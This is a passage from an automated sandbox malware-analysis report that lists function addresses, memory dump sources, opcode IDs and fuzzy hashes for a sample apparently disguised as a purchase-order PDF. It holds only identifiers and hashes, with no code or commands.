                                            • Instruction Fuzzy Hash: B2D017B08042688AEB15AB20E8143AB7AB2BB09300F005096C182B2685EB394950DF50
                                            Function 061F99E8 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1779519b913f0efa5c2d2a833b328c0c6524e1db619f5c2c22e305cda75a79a1
                                            • Instruction ID: 0fb9eda51ef4d3df5bc9478c138a4dbfc93b4cf8262879343cdad5428c9aae17
                                            • Opcode Fuzzy Hash: 1779519b913f0efa5c2d2a833b328c0c6524e1db619f5c2c22e305cda75a79a1
                                            • Instruction Fuzzy Hash: C3C02B3105F20D8EC2583749689C370F3ECE74631AF415D00970C020718F702080C140
                                            Function 063BD538 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1698f44478369743dc57b43c0aa83ea7be3fb0d681acde6eea33f5be57d8204
                                            • Instruction ID: 07f287e326aa223b3f8fb77734255f5612a6771629cb253da014df46369268e4
                                            • Opcode Fuzzy Hash: a1698f44478369743dc57b43c0aa83ea7be3fb0d681acde6eea33f5be57d8204
                                            • Instruction Fuzzy Hash: C1C08C2008E20987D2881746641E3B176ACCBC232AF402802631C008248F700050CD9A
                                            Function 061F55AD Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 31e29d5c9d565bad4ceb6a22d31dd3a925c1b1ee8348ae1c31150bb85c052f26
                                            • Instruction ID: 03c3f65d0113f0e03fed4b2c38cb7cb523055dff1007bbf3fb6375ef074a27d5
                                            • Opcode Fuzzy Hash: 31e29d5c9d565bad4ceb6a22d31dd3a925c1b1ee8348ae1c31150bb85c052f26
                                            • Instruction Fuzzy Hash: 1DD05EB4C052288BD7259F20D42439C7BB1FB05300F0040D6C182B2282D7380A44DF01
                                            Function 061FB450 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7a92ec546087bcb8407aebb223a5b4ade6c897db81e4b2601c82929b44e2c77
                                            • Instruction ID: cab9cb1a232fc925b9cd39ba9c23091efff9663e522f685ab96aac1d328fd258
                                            • Opcode Fuzzy Hash: c7a92ec546087bcb8407aebb223a5b4ade6c897db81e4b2601c82929b44e2c77
                                            • Instruction Fuzzy Hash: 2ED09238A05228CFEFA08B10DC4CF99BB72AB08300F00C1C0E209672A5CB715E809F50
                                            Function 05F21BD0 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 267f90107477f74eb63af8eceec7a50f83dc78b39fe330b856c418cf5ab934d1
                                            • Instruction ID: b53b24fff3ee114d29b0c4e55929479d541106cc541cd0dd0f95ebb3d62a9744
                                            • Opcode Fuzzy Hash: 267f90107477f74eb63af8eceec7a50f83dc78b39fe330b856c418cf5ab934d1
                                            • Instruction Fuzzy Hash: 7AC08C328140102AFFA45200CC4B7873A11C342700F0182207111D2200D626890094CA
                                            Function 05F539B2 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 378c8cd2b198b3e0eb9c59bb6ee8e3a99c5d4fdf5b1ad811b99055924033ad47
                                            • Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
                                            • Opcode Fuzzy Hash: 378c8cd2b198b3e0eb9c59bb6ee8e3a99c5d4fdf5b1ad811b99055924033ad47
                                            • Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50
                                            Function 05F2AEF0 Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                            Function 01188618 Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03c9f05fd0dedfcefd85412935b3ac550192a99fb70918e07cac5dae544f7333
                                            • Instruction ID: e3fa812d4925f47fb56bca3743549030cd17c49bb50eabea4a58b1388afb527e
                                            • Opcode Fuzzy Hash: 03c9f05fd0dedfcefd85412935b3ac550192a99fb70918e07cac5dae544f7333
                                            • Instruction Fuzzy Hash: 52C04C74D18258CBEB249F11D949AD9BAF0AF46305F0060DD944972540D7701A80CF5A
                                            Function 05F2EFE0 Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d136aa83ae228e39e2bc8d5aa3eb28192995313112010915d56661e575ff103a
                                            • Instruction ID: 98e908684465f3ec733337fb31a6f4fb248aa42e0f89c51f5be888e81635a1fe
                                            • Opcode Fuzzy Hash: d136aa83ae228e39e2bc8d5aa3eb28192995313112010915d56661e575ff103a
                                            • Instruction Fuzzy Hash: 61B09236010208AB86049A95E804895BB69AB5DA00740C029B619061128B33E862DB94
                                            Function 01180841 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc656ee0065cdd21148d562ff654611447e46290de58abf884ca1df25eda8e5e
                                            • Instruction ID: c82183347a2b0b412e96f8f12018d87de8f2f2d3b4bf79c51d10c22a062b05fa
                                            • Opcode Fuzzy Hash: fc656ee0065cdd21148d562ff654611447e46290de58abf884ca1df25eda8e5e
                                            • Instruction Fuzzy Hash: 55B0120050D58096C30A47606828381B770BF82600FCC09EE44C58069FF5C80014932C

                                            Non-executed Functions

                                            Function 05EE5381 Relevance: 4.0, Strings: 3, Instructions: 240COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TJcq$Te^q$xbaq
                                            • API String ID: 0-3225726259
                                            • Opcode ID: 051f4edeac3bd766595ce11936ff225f02fc21dd6af34ef0779816db999b17cd
                                            • Instruction ID: 9bc939d0cd6e78f537cc2438cd428f5c9db9a1ec0a946951c0a10677652bcb1e
                                            • Opcode Fuzzy Hash: 051f4edeac3bd766595ce11936ff225f02fc21dd6af34ef0779816db999b17cd
                                            • Instruction Fuzzy Hash: 2DB18575E016188FDB58CF6AD944ADDBBF2AF89304F14C0AAD909AB365DB305E81CF50
                                            Function 05F21748 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq$,bq
                                            • API String ID: 0-1616511919
                                            • Opcode ID: ce5aca3e8ee4354f3ce7163cdbf0873d10aab7bfb76549028798ef661e890d7f
                                            • Instruction ID: 00fa5dee8dc05cef351c94a36167873b3e91e79c09c5149973ba2bc49d1ae099
                                            • Opcode Fuzzy Hash: ce5aca3e8ee4354f3ce7163cdbf0873d10aab7bfb76549028798ef661e890d7f
                                            • Instruction Fuzzy Hash: B5D11975A002248FDB14DF69C584EAAB7F2FF88315F25C5A9E805AB361D738EC41CB54
                                            Function 0118207D Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q
                                            • API String ID: 0-2697143702
                                            • Opcode ID: 2ba73d7b177435475122b8cf43871f2002a19efafd98dbbcfcdace30a9c9a1a6
                                            • Instruction ID: 47a9391c1624838ff0f7a7d2646a7b7a0e2e31e5183efe91cd00db386907a36b
                                            • Opcode Fuzzy Hash: 2ba73d7b177435475122b8cf43871f2002a19efafd98dbbcfcdace30a9c9a1a6
                                            • Instruction Fuzzy Hash: A2711CB1E012188FD708DF7AE96179ABBF3BFC8305F44C529D408AB269EB355905DB90
                                            Function 01182098 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q
                                            • API String ID: 0-2697143702
                                            • Opcode ID: 15e6d8aeeb160168d2b567eeb9f1f0a1bea4b00f41c4507e2a55f6e6a66a0d98
                                            • Instruction ID: e2d7b5ddb962396b3a56e536ea99ed957c041bf3758bda6e58abe70d74187bee
                                            • Opcode Fuzzy Hash: 15e6d8aeeb160168d2b567eeb9f1f0a1bea4b00f41c4507e2a55f6e6a66a0d98
                                            • Instruction Fuzzy Hash: DD7109B0E012188FD708EF7AE95179ABBF3BFC8305F44C529D408AB669EB741905DB90
                                            Function 06210548 Relevance: 1.8, Strings: 1, Instructions: 600COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq
                                            • API String ID: 0-149360118
                                            • Opcode ID: ea5a799506d9e07fa9a4d5fc80dc02ece74b61e4f2bbc661c4ec2cbf7bdf9fcb
                                            • Instruction ID: 9c9f46b61245be7a1cd8dd14feec1dc64157aef07ea4ed2c6b53ec933c96fa49
                                            • Opcode Fuzzy Hash: ea5a799506d9e07fa9a4d5fc80dc02ece74b61e4f2bbc661c4ec2cbf7bdf9fcb
                                            • Instruction Fuzzy Hash: 70328E74B152168FCB58DF69C49466EFBF2FF88300F148529E956DB381DB34A981CB90
                                            Function 05F52190 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *?/*
                                            • API String ID: 0-140231504
                                            • Opcode ID: 708072e791f2f34aded7ce5a99df653381832475e5d20c6a2977cf884c09ac17
                                            • Instruction ID: 23457154ebdb4afcfc0ac3181b644bbbcb9ceb9fb24726a54641ff86770ac56e
                                            • Opcode Fuzzy Hash: 708072e791f2f34aded7ce5a99df653381832475e5d20c6a2977cf884c09ac17
                                            • Instruction Fuzzy Hash: 2812B375E046189FDB14CFAAC98069DFBF2BF88314F24C269D518EB21AD734A946CF50
                                            Function 062136D6 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: dbq
                                            • API String ID: 0-1887291361
                                            • Opcode ID: d79004fd260a44bf4b2216d0307938ac1c9d51de768f09774303b6f4ae93c8cf
                                            • Instruction ID: 42490d3e6847be638aa4324a85980b1d475fb8521ac544168787a3e1828ae956
                                            • Opcode Fuzzy Hash: d79004fd260a44bf4b2216d0307938ac1c9d51de768f09774303b6f4ae93c8cf
                                            • Instruction Fuzzy Hash: 5E8126B4D15219CFDB54DFA9E844BEDBBF2BB89304F00806AD809AB355DB74598ACF40
                                            Function 062136E0 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: dbq
                                            • API String ID: 0-1887291361
                                            • Opcode ID: 45eb5ee218370cae8d809ae96d7410bb00ef15be95c8d210b4955157aca306bb
                                            • Instruction ID: dda02964fa72ef147cad817a04b3cd4aa07836304f44d57cc9784beef80037ee
                                            • Opcode Fuzzy Hash: 45eb5ee218370cae8d809ae96d7410bb00ef15be95c8d210b4955157aca306bb
                                            • Instruction Fuzzy Hash: 4D8125B4D15219CFDB54DFA9E844BADBBF2BF89304F00806AD809AB355DB74598ACF40
                                            Function 05F5604B Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *?/*
                                            • API String ID: 0-140231504
                                            • Opcode ID: 78ab97f28dea0e83680f6e9fba483a8be3dd475013ec5269820ec64e6dd7eea1
                                            • Instruction ID: 4f97e3f066d5cda644a78868c951f2ace95d608597946a06173103d14e0e280f
                                            • Opcode Fuzzy Hash: 78ab97f28dea0e83680f6e9fba483a8be3dd475013ec5269820ec64e6dd7eea1
                                            • Instruction Fuzzy Hash: BC614DB4E10629CFDBA4CF69C884B9DBBF1BF48314F1185AAD458E7202D7349A86CF10
                                            Function 05EED908 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ~
                                            • API String ID: 0-1707062198
                                            • Opcode ID: da1cb4f5a1895053784021cb76f82c31128943f4c338c22a0e9ae386110006a3
                                            • Instruction ID: 12b51bdb01f14c30473be913a623655128fd2372283f03ef102a2da8eb7f7abb
                                            • Opcode Fuzzy Hash: da1cb4f5a1895053784021cb76f82c31128943f4c338c22a0e9ae386110006a3
                                            • Instruction Fuzzy Hash: 7031C0B1D056188BEB1CCF6B8D442DAFAF7AFC8300F14D1BA844DA6224EB710A858F00
                                            Function 061FE661 Relevance: .2, Instructions: 239COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 451dafe73f6d9b4c623008446f62dc75221d04e18d2a644a1876f19a03b2db1a
                                            • Instruction ID: 9ae02a23e5b585c8365df501d25042fa61df51d77d9c9f29a162349451ba4fd2
                                            • Opcode Fuzzy Hash: 451dafe73f6d9b4c623008446f62dc75221d04e18d2a644a1876f19a03b2db1a
                                            • Instruction Fuzzy Hash: E0A16974D11208DFEB98DFA5D994BADBBF2FF49304F50902AE509A72A4EB345984CF40
                                            Function 061FE670 Relevance: .2, Instructions: 237COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 706d8e4e41bd71f5710282a43e00cfa6b1d25ae41d13db7b9df2484344ff87ce
                                            • Instruction ID: 418499fecb658d8921c3a7d6c5ac89cb5616358b2c5f154ef81d7674378986f2
                                            • Opcode Fuzzy Hash: 706d8e4e41bd71f5710282a43e00cfa6b1d25ae41d13db7b9df2484344ff87ce
                                            • Instruction Fuzzy Hash: 09A18B70D15208DFEB98DF65D994BADBBF2FB49304F50902AE50AA73A4EB345844CF40
                                            Function 061F7718 Relevance: .2, Instructions: 237COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 151e07a6040b3984444784ef71de35afdecfaac0c983b93826e4571510f8fd8a
                                            • Instruction ID: c93d1df554c600f02eb723425164356491667e42ac0723708be3ed721f99e087
                                            • Opcode Fuzzy Hash: 151e07a6040b3984444784ef71de35afdecfaac0c983b93826e4571510f8fd8a
                                            • Instruction Fuzzy Hash: D7A11474D15208CFDB48CFA9E498BADBBF2FB49304F24816AD109A72A4DB345885CF50
                                            Function 061F7728 Relevance: .2, Instructions: 237COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a8ee0d70c817accf3f8756314b5accf0022b8a392c7416077ab3b56165767bf
                                            • Instruction ID: d65425e78167542ad15121dcdcbc6372faf25ac82a385134b5c8e5fefdb69e0a
                                            • Opcode Fuzzy Hash: 0a8ee0d70c817accf3f8756314b5accf0022b8a392c7416077ab3b56165767bf
                                            • Instruction Fuzzy Hash: 4AA12674D15208CFDB48CFA9E488BADBBF2FB89300F15816AD109A73A4DB345885CF50
                                            Function 05EEAA60 Relevance: .2, Instructions: 194COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0e848ec65e03b5b73096e6a7a3c144108df6b824d5ae3120dd4f0948efc732d
                                            • Instruction ID: ac121c1c9d752c2b0d426c097290d401559e9a1072bdc0befef51afc42c2d31c
                                            • Opcode Fuzzy Hash: f0e848ec65e03b5b73096e6a7a3c144108df6b824d5ae3120dd4f0948efc732d
                                            • Instruction Fuzzy Hash: BA71F370D15209CBEB04CFA9D609BEEBBF2BB88304F14A07ED559B3240E7750A45CB55
                                            Function 063BD1A8 Relevance: .2, Instructions: 191COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c9a41c3630df4fd5bba80894dc15a643e04c97076f281c20d7a5bc767e7f0dd
                                            • Instruction ID: ed3fec6b7085334015cb8d6ff81eb18d99c19bb1a61425da573bdbbca36fbb69
                                            • Opcode Fuzzy Hash: 3c9a41c3630df4fd5bba80894dc15a643e04c97076f281c20d7a5bc767e7f0dd
                                            • Instruction Fuzzy Hash: A1714E74E04218CFEBA4DF69D844BDDBBB6BF89300F14A069C50DABA51DB705985CF90
                                            Function 06214210 Relevance: .2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1cda0f80767b4524c4b2ef827afc02c1221052e44f460d1abf2e55ed7848c039
                                            • Instruction ID: 4957180fc63b290ead9dc495baca57cc604987f608181c5ede5d0fea1adb341a
                                            • Opcode Fuzzy Hash: 1cda0f80767b4524c4b2ef827afc02c1221052e44f460d1abf2e55ed7848c039
                                            • Instruction Fuzzy Hash: 44518674D1A208CFEB44EFA8E5547EDBBF2EB99314F20902AD809BB245D7344986CF40
                                            Function 06214240 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0956350668d93a057635565a930688ff9b63a62c7be298231cc8d4d4f4db8ccd
                                            • Instruction ID: b9677b69736bdbbdff91db304b1fb884a0ba96ad954ef726be87bf09ba6974a1
                                            • Opcode Fuzzy Hash: 0956350668d93a057635565a930688ff9b63a62c7be298231cc8d4d4f4db8ccd
                                            • Instruction Fuzzy Hash: CB516770D2A218CFEB84EFA8D5447EDBBF6EB99311F609029D809BB244D7745886CF44
                                            Function 061FAE28 Relevance: .1, Instructions: 136COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3dbbea8920d7001ba417afa1fc87f872343d93445a8ae8d7432617c11ee957be
                                            • Instruction ID: 8be9317c6a890b073b0d05b2ffa4cdbb91ffe652624a297711a2596a8555746c
                                            • Opcode Fuzzy Hash: 3dbbea8920d7001ba417afa1fc87f872343d93445a8ae8d7432617c11ee957be
                                            • Instruction Fuzzy Hash: 3851E274D15228CFEBA8CF1AC858B99B7B2AF89304F15C4EAC50DB7251DB744A89CF10
                                            Function 05F52181 Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebea36dbcdb2d6252ee7ed17f69639cbeb2d9116f699a8f73752b65f0123cc48
                                            • Instruction ID: 3a84c50b96e4cff6400d1e6a302e3a6085cfc79a986eabf14911f1fc9d6ffe4b
                                            • Opcode Fuzzy Hash: ebea36dbcdb2d6252ee7ed17f69639cbeb2d9116f699a8f73752b65f0123cc48
                                            • Instruction Fuzzy Hash: A64158B5E016199BEB08CFABD94069EFBF3BFC8310F14C17AD918AB214EB3459458B54
                                            Function 061FAE26 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 448508093c25e1e1506aebdec693c1092469eead5fd5815ee9fbda7e5d23ef64
                                            • Instruction ID: 5ddbda054073b0a068c4999aa732953240f14da757331c1a7f9c3e580a49f753
                                            • Opcode Fuzzy Hash: 448508093c25e1e1506aebdec693c1092469eead5fd5815ee9fbda7e5d23ef64
                                            • Instruction Fuzzy Hash: 2D51E274D15228CFEBA8CF5AC844B99B6F2AF89300F15C4EAC50DA7251DB784AC9CF10
                                            Function 05EE05E8 Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
